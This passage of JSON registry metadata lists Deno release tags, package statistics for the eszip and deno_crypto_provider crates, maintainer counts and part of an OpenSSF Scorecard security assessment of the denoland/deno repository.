,"dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T19:12:57.863Z","dependent_packages_count":8,"downloads":563787,"downloads_period":"total","dependent_repos_count":12,"rankings":{"downloads":5.358666207701633,"dependent_repos_count":7.366734787067604,"dependent_packages_count":4.227386699599566,"stargazers_count":11.01516081236811,"forks_count":11.475532535963954,"docker_downloads_count":6.771453164177988,"average":7.702489034479808},"purl":"pkg:cargo/eszip","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/eszip","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/eszip","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/eszip/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/eszip/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/eszip/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/eszip/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/eszip/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/eszip/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/eszip/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:59:39.254Z","updated_at":"2022-11-07T18:59:39.254Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-22T15:45:43.463Z","updated_at":"2023-07-22T15:45:43.463Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":11828483,"name":"deno_crypto_provider","ecosystem":"cargo","description":"Cryptography provider for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":52,"first_release_published_at":"2025-06-23T09:18:14.497Z","latest_release_published_at":"2026-08-27T15:21:15.557Z","latest_release_number":"0.52.0","last_synced_at":"2026-09-07T22:54:26.189Z","created_at":"2025-06-23T09:31:04.447Z","updated_at":"2026-09-07T22:54:26.189Z","registry_url":"https://crates.io/crates/deno_crypto_provider/","install_command":"cargo install deno_crypto_provider","documentation_url":"https://docs.rs/deno_crypto_provider/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 